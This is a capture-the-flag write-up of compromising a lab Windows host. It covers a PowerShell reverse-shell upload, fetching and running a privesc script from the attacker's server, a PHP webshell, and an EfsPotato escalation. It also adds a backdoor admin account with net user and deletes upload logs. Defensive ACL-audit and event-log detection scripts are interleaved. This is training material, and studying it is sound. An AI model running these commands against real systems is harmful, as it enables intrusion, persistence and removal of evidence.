Evasion

Target IP: 10.10.130.66
Challenge Description:


Reconnaissance

Performing a port scan using the command sudo nmap -sS 10.10.130.66 -Pn -p- -g 80 against the target Windows machine returns the result above. However, the description of this challenge mentions visiting the application on port 8080.

I will primarily focus on the application on port 8080, as the main task of this challenge is to evade the security mechanisms in place on the target machine. I performed an aggressive scan against port 8080 using the command sudo nmap -sV -A 10.10.130.66 -Pn -p 8080 -g 80 and obtained the result shown above. By the looks of it, the target machine is running the Apache 2.4.56 web server. The title of the web application also mentions PowerShell Script Analyser. Maybe I can upload a malicious PowerShell script to obtain a reverse shell?


Enumeration & Exploitation

Port 8080: HTTP
The webpage above is displayed to me when I visit this port. This web application takes in a .ps1 PowerShell script via a file upload. I viewed the source code of this webpage, but I did not find anything useful. Time to test the web application via file uploads.

I searched for PowerShell reverse shell scripts in .ps1 format, and found the GitHub repository shown above. Then I downloaded a copy of the reverse shell script to my machine as shell.ps1.

I made the changes to the IP and port, as shown above. If this file is successfully uploaded and executed by the target machine, it will invoke a reverse shell connection to my machine at port 80.

I started a listener on my machine at port 80. I chose to upload the malicious shell.ps1 as shown in the image above.

And bingo! The malicious script was successfully uploaded. The script was executed by the target machine without any issues, as shown in the image above.

Now I have a reverse shell connection from the target machine, as shown above. After waiting for a few seconds, the target machine invoked a connection, and now I have a foothold on it. Time to escalate my privileges and obtain the flags!


Privilege Escalation

After some manual enumeration, I did not find anything useful. Then I decided to use an automated privilege escalation checker from the GitHub repository shown above. I downloaded PrivescCheck.ps1 to my machine. Time to serve this file to the target machine. I started a Python HTTP server on my machine at port 443.

Then using the commands iwr -uri http://10.14.55.153:443/PrivescCheck.ps1 -o PrivescCheck.ps1 and powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck", I executed the privilege escalation checker tool as shown above. Time to look for useful privesc information now.

Right off the bat, I noticed the crucial information above. By the looks of it, the user evader has write permissions on the C:\xampp\ directory, including the httpd.exe binary file. From previous enumeration, I know the web application is being served from htdocs. Maybe I can upload a webshell here so it gets executed?
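
From the defender's side, the finding above is a file-system ACL problem: a low-privilege account can write into the web-server install tree. The following audit script is an added example, not part of this writeup or of PrivescCheck; it assumes the C:\xampp path from the writeup, treats the evader account as the web-service user, and uses a guessed list of low-privilege principals.

```powershell
# Added example (not from the writeup): list every file or folder under a web-server install
# where a low-privilege identity holds Write, Modify or FullControl. Any such entry lets that
# identity replace binaries (httpd.exe) or drop files into htdocs, which is what the writeup abused.
# $Root comes from the writeup; $ServiceAccount and $RiskyPrincipals are assumptions. Run elevated.
param(
    [string]$Root = 'C:\xampp',
    [string]$ServiceAccount = 'evader',
    [string[]]$RiskyPrincipals = @('Everyone', 'BUILTIN\Users',
                                  'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
)

# Bitmask of rights that allow changing content; cast to int so generic-rights ACEs still compare.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
             [int][System.Security.AccessControl.FileSystemRights]::Modify -bor
             [int][System.Security.AccessControl.FileSystemRights]::FullControl

Get-ChildItem -LiteralPath $Root -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $item = $_
        $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
        if (-not $acl) { return }
        foreach ($ace in $acl.Access) {
            # Only Allow entries matter; Deny entries reduce access.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $id = $ace.IdentityReference.Value
            $risky = ($RiskyPrincipals -contains $id) -or ($id -like "*\$ServiceAccount")
            if ($risky -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) {
                [pscustomobject]@{
                    Path      = $item.FullName
                    Identity  = $id
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited   # inherited entries point at the parent folder's ACL
                }
            }
        }
    } | Sort-Object Path | Format-Table -AutoSize
```

Entries marked Inherited = True are fixed by correcting the ACL on the parent directory rather than on each file.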

I transferred the webshell to the target machine. I used the PHP webshell from this GitHub repository.

And bingo! Now I can use the PHP webshell, as shown above. Time to enumerate further.

Voila! Running the command whoami /priv shows the SeImpersonatePrivilege privilege is set.

I located the EfsPotato exploit for this privilege escalation vector at the GitHub repository shown above. Then I downloaded EfsPotato.cs to my machine. Then I transferred it to the target machine via the PHP webshell, into the htdocs directory of C:\xampp\.

Since the exploit has to be compiled, I have to locate a C# compiler on the target machine. After some manual enumeration, I located it at C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe. Then using this, I compiled the C# code by using the command C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618. Now I have an executable file.

And running the command EfsPotato.exe "whoami" shows the result above. Now I have an nt authority\system shell on the target machine. I cannot use this to read the contents of the last flag; therefore, I will create an admin user and log in to read the final flag.

The command I used is EfsPotato.exe "cmd.exe /c net user root password123@ /add && net localgroup administrators root /add". Since port 3389 is also open, I can RDP into the target machine as this new admin user :)
After creating the user root with administrator privileges, I ran the command net user. This command output the new user, as shown above. Running net user root shows this user is part of the administrators group. However, I am unable to RDP into the target machine via xfreerdp.
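
The account creation and group change above leave a clear trail in the Security log: event 4720 (user account created) followed by 4732 (member added to a security-enabled local group). The script below is an added detection example, not part of this writeup; it assumes the "User Account Management" and "Security Group Management" audit subcategories are enabled, that it runs elevated on the host, and the 24-hour look-back window is an assumption.

```powershell
# Added example (not from the writeup): correlate Security events 4720 and 4732 to flag an
# account that was created and then added to Administrators within the window, the sequence
# produced by "net user ... /add && net localgroup administrators ... /add".
# Assumes the relevant audit subcategories are enabled and the script runs elevated.
param([int]$Hours = 24, [string]$Group = 'Administrators')

# Read one named field from an event's EventData by name, so the code does not rely on field order.
function Get-EventField {
    param($Record, [string]$Name)
    $xml = [xml]$Record.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# 4732 usually carries the member as a SID; resolve it to DOMAIN\name (local SIDs resolve on the host).
function Resolve-Sid {
    param([string]$Sid)
    try {
        (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate(
            [System.Security.Principal.NTAccount]).Value
    }
    catch { $Sid }
}

$filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = (Get-Date).AddHours(-$Hours) }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | Sort-Object TimeCreated

$created = @{}   # lower-cased account name -> when it was created and by whom
foreach ($e in $events) {
    if ($e.Id -eq 4720) {
        $name = Get-EventField $e 'TargetUserName'
        $created[$name.ToLower()] = @{ When = $e.TimeCreated; By = (Get-EventField $e 'SubjectUserName') }
        continue
    }
    # 4732: TargetUserName is the group the member was added to.
    if ((Get-EventField $e 'TargetUserName') -ne $Group) { continue }
    $member = Resolve-Sid (Get-EventField $e 'MemberSid')
    $short  = ($member -split '\\')[-1].ToLower()
    if ($created.ContainsKey($short)) {
        [pscustomobject]@{
            Time       = $e.TimeCreated
            NewAccount = $member
            CreatedAt  = $created[$short].When
            CreatedBy  = $created[$short].By
            AddedBy    = Get-EventField $e 'SubjectUserName'
        }
    }
}
```

A hit where CreatedBy and AddedBy are the web-service account, or a SYSTEM context that never normally manages users, is the signal to investigate.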

Using the command xfreerdp /u:root /p:password123@ /v:10.10.130.66, I RDPed into the target machine as the user root as shown above. Now I have full RDP administrator access on the target machine. GG.


Flags

After landing a shell on the target machine, I noticed an unusual file named encodedflag on the Desktop of the current user, as shown above. The content of the encoded flag is also shown above.

I used CyberChef to decode the flag, and obtained the result above. The decoded string tells me to visit http://10.10.130.66:8080/asdasdadasdjakjdnsdfsdfs.php to obtain the first flag.

However, visiting http://10.10.130.66:8080/asdasdadasdjakjdnsdfsdfs.php displays the message above. Time to find and remove the file-upload log files mentioned in the image above.

After some enumeration, I found the log files for file uploads at C:\xampp\htdocs\uploads. Then using the command Remove-Item log.txt, I removed the log file. And bingo! After removing the file, I was able to read the flag at the http://10.10.130.66:8080/asdasdadasdjakjdnsdfsdfs.php URL as shown above.

The root flag is shown above. This flag is located on the Desktop of the user Administrator.